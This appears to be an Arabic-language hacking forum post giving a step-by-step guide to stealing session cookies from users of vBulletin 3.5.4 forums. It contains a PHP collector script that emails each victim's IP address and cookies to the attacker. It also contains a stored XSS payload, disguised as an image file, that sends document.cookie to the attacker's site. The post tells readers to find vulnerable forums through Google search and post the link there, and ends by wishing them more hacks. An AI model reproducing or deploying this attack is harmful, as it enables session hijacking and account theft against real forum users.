| انا حشرح الثغره
امشي معاي خطوه خطوه
الخطوه الاولى. اعمل فايل وسميه "exploit.php" ولاتنس الامتداد
الخطوه الثانيه.حط بالفايل هذا الكود:
كود: <?php $ip_adresse = $_SERVER['REMOTE_ADDR']; if(!empty($ip_adresse)) { echo 'il tuo ip è: ',$ip_adresse; } else { echo 'Impossible d\'afficher l\'IP'; } ?> <a href="log.php"></a><? $xx1=$HTTP_SERVER_VARS['SERVER_PORT']; $day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; else $visitor_info = $REMOTE_HOST; $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; $x1=`host $REMOTE_ADDR|grep Name`; $x2=$REMOTE_PORT; ?> <?php $****** = $_GET['c']; ?> <?php $myemail = "YOUR ADDRESS E-MAIL"; $today = date("l, F j, Y, g:i a") ; $subject = "Xss Vbulletin" ; $message = "Xss: Hacking Ip: $ip_adresse ******: $****** Url: $base porta usata: $xx1 remote port: $x2 Giorno & Ora : $today \n "; $from = "From: $myemail\r\n"; mail($myemail, $subject, $message, $from); ?>
الخطوه الثالثه. ابحث عن السطر:
الكود:
كود: <?php $myemail = "YOUR ADDRESS E-MAIL";
وبعد ما تحصله
الخطوه الرابعه أ. استبدل "YOUR ADDRESS E-MAIL" باميلك بريدك
الخطوه الرابعه ب.اترك الملف بمكان قريب, مثل سطح المكتب
الخطوه الخامسه.اعمل ملف جديد txt والي ما يعرف يروح سطح المكتب كليك يمين new txt document
الخطوه السادسه.ضع بالملف هذا الكود:
كود: <pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' >
الخطوه السابعه. ابحث عن السطر:
الكود:
كود: location="http://YOUR ADDRESS WEB.com
الخطوه الثامنه. استبدل "YOUR ADDRESS WEB.com" بموقعك + المسار الموجود فيه exploit
مثال: عفوا صاحب الموضوع تعب في احضار الروابط هذه لك ألا ترى انه من اللائق الرد على موضوعه لنمنحه التشجيع تقديرا له وليواصل عطاءه ويزودك مزيداً حول هذا المجال خلال هذه الفترة الحالية تستطيع الرد باستخدام الوضع المتطور للرد فقط اسفل هذا الموضوع عن طريق ايقونة اضافة رد وشاكراً لك دعمك ليكون الجميع في خدمتك في هذا الملتقى
الخطوه التاسعه.عدل اسم الملف txt بحيث يصبح gif.txt.*
مع استبدال * باسم الملف يعني مثلا: image.gif.txt يعني انت حتروح rename واتحط اسم الملف image.gif
ونحن حنعتبر اسمه كده
الخطوه 10. الان صار عندنا ملفين
exploit.php و ملف اسمه image.gif
الخطوه11. ارفع الملفين على موقعك
مع ملاحظة ان الخطوه الثامنه لها علاقه بالخطوه 11 لانك بتحط المسار تاع الموقع
ابحث في قوقل عن
"powered by vbulletin 3.5.4"
سجل في المنتدى
اكتب موضوع واختار قصه حلوه
وحط الينك بتاع الي هو اسمه image
والي بيدخل عليه بيوصلك بيانات الكوكيز تاعه الي سجل في بالمنتدى
ثغره خطيييييييييييييره
مع تمنياتي لكم باالمزيد من الاختراقات
بالتوفيق |
.gif)
.gif){kind=icon}
ثغرة خطيرة في منتديات 3,5,4 في بلاتين 
العرض العادي
